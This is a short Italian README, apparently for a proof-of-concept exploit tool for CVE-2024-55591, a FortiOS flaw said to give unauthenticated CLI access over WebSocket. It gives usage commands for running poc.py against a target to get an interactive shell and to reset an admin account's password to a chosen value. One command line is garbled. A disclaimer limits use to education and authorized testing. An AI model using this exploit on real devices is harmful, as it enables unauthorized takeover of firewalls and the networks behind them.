
Exploit proof-of-concept per CVE-2024-55591, che consente accesso CLI WebSocket non autenticato ai dispositivi FortiOS, con shell interattiva e reset della password admin.
Questo è uno strumento Proof-of-Concept (PoC) per sfruttare CVE-2024-55591, una vulnerabilità in FortiOS che consente l'accesso non autenticato alla CLI tramite WebSocket.
--reset-user)python3 poc.py --host <ip_target> --port 443 --ssl
Quindi utilizza il prompt:
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <ip_target> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
Disclaimer: Questo strumento è fornito esclusivamente per scopi educativi e di test autorizzati.